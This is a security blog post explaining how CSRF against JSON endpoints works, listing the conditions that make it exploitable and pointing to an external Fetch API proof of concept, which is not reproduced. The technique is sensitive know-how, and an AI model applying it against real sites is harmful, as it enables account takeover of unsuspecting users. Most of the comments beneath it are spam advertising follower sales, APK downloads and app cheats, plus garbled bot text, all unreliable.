Press "Enter" to skip to content

Exploiting CSRF on JSON Endpoint without Flash


Before we begin with JSON CSRF we need to nail down the Fundamentals of traditional CSRF and JSON based CSRF.

What is CSRF?

CSRF is Cross-Site Request Forgery vulnerability which can be used to force an user to conduct unintended actions on a Web Application. Using this flaw an attacker can perform various attacks based on the affected module such as changing Email ID, Password for the User’s Account.

CSRF on JSON Endpoint:

When performing CSRF on JSON Endpoint Server usually rejects the request due to extra padding from traditional CSRF Exploit with HTML forms. Usually server checks for Content-Type: application/json Header which becomes hard to exploit as we cannot change content-type in HTML. In order to perform JSON CSRF below conditions should be met:

  • User should be loggedin
  • Authentication Method should be cookie based only
  • No Authentication Token present in Header
  • Same-Origin Policy should not be enforced
  • Application accepts any content type: Easily Exploitable with HTML forms
  • Application only accepts application/json content type: Exploitable with Fetch API

When trying CSRF on such Endpoints with HTML we can often face padding issues due to HTML Forms which is why we are going to use Fetch API in Javascript.

CSRF Fails due to padding in HTML form for JSON request

We are going to use our JSON CSRF PoC Code from Github and replace URL and JSON Body.

JSON CSRF Exploit Code

You can find this exploit code on the github page.

Using above code we can edit the URL and replace the body with the JSON Data to perform CSRF.


After performing CSRF we are redirecting user to other page.

CSRF Exploited and User Redirected


This CSRF was exploitable due to lack of Anti-CSRF Token and Cookie Based Authentication, using Token Based Authentication could have fixed the issue as well.

Thank for reading do follow @rootsploit for more InfoSec Writeups!!!



  1. skofos skofos August 1, 2020

    nice mateee i love this article

  2. Gt Gt August 4, 2020


  3. Darin Darin January 19, 2021

    One the training has ended you will be required to fill some online forms for
    several companies. Sometimes, clients based their decisions in hiring with the information inside
    the resume. It is important to execute a criminal history check for
    the program along with the people running it to make sure you’re picking a legitimate one.

  4. free bitcoin free bitcoin January 19, 2021

    Hi there, I enjoy reading through your post. I wanted to write a little comment to support you.

  5. takip├ži sat─▒n al takip├ži sat─▒n al January 20, 2021

    Takip├ži sat─▒n almak i├žin t─▒klay─▒n. Hemen t─▒klay─▒n ve takip├ži sat─▒n al sayfam─▒zdan takip├ži sat─▒n al─▒n.

  6. microsoft word indir microsoft word indir January 20, 2021

    Microsoft word indirmek i├žin t─▒klay─▒n. Microsoft word indir sayfam─▒zdan hemen indirebilirsiniz.

  7. netblu netblu January 20, 2021

    Netblu indirmek i├žin t─▒klay─▒n. Netblu indir sayfam─▒zdan netblu indirin.

  8. reality tv reality tv January 21, 2021

    Reality tv indirmek i├žin t─▒klay─▒n. Reality tv sayfam─▒zdan realty tv indirin.

  9. kesintisiz tv kesintisiz tv January 21, 2021

    Kesintisiz tv indirmek i├žin t─▒klay─▒n. Kesintisiz tv
    sayfam─▒zdan kesintisiz tv indirin.

  10. tiktok jeton hilesi tiktok jeton hilesi January 21, 2021

    Tiktok jeton hilesi i├žin t─▒klay─▒n. Tiktok jeton hilesi sayfam─▒zdan tiktok jeton hilesi indirin.

  11. bein connect indir bein connect indir January 22, 2021

    Bein Connect apk indirmek i├žin t─▒klay─▒n. Hemen t─▒klay─▒n ve Bein Connect indirin.

  12. misli indir misli indir January 22, 2021

    Misli indirmek i├žin hemen t─▒klay─▒n. Misli sayfam─▒zdan misli apk indirin.

  13. cs 1.5 indir cs 1.5 indir January 22, 2021

    CS 1.5 indirmek i├žin hemen t─▒klay─▒n. CS 1.5 sayfam─▒zdan CS 1.5

  14. fatural─▒ hatta kredi fatural─▒ hatta kredi January 23, 2021

    Fatural─▒ hatta kedi arayanlar i├žin fatural─▒
    hatta kredi sitesi. T─▒klay─▒n ve fatural─▒ hatta kredi al─▒n.

  15. Ilana Ilana January 24, 2021

    If the glass is suited tight at each party with a wooden surface you’ll be able it could possibly crack as time passes as wood
    can expand slightly according to the temperature. A splashback
    can be a simple white or transparent to complement the
    current cabinets or worktops to prospects in vibrant reds, greens, pinks,
    and blues to provide a very distinctive design feature.
    It may be moulded and cut to almost any shape, integrating holes for sockets and pipes, raised cooling racks as well as integrated bowls.

  16. January 26, 2021

    In the following lines, we’re going to give you tips on how to make your
    own court. This sport isn’t just about physical progression of the kids but in addition their socialization among
    other children the ones is likewise practiced.
    Crossing or stepping around the baseline is known as a foot fault and results in one to
    lose a point.

  17. btcturk g├╝venilir mi btcturk g├╝venilir mi January 27, 2021

    Btcturk g├╝venilir mi diye merak edenler i├žin btcturk g├╝venilir mi
    sorusunun yan─▒t─▒ bu i├žerikte.

  18. When choosing to enter the world of business, you enter it with all the intent to succeed.
    Thus, you can become an unwitting criminal by evading your required payment.
    If the option position expires in the next season, the tax reporting is done inside subsequent
    year if the position closes.

  19. Energy Booster Energy Booster February 18, 2021

    Specifically the type of material that improves the internet. Thanks!

  20. SA SA February 20, 2021

    635422 358738Some truly good stuff on this site , I like it. 523603

  21. 948635 404299This sort of considering develop change in an individuals llife, building our Chicago Pounds reduction going on a diet model are a wide actions toward generating the fact goal in mind. lose weight 969523

Leave a Reply

Your email address will not be published. Required fields are marked *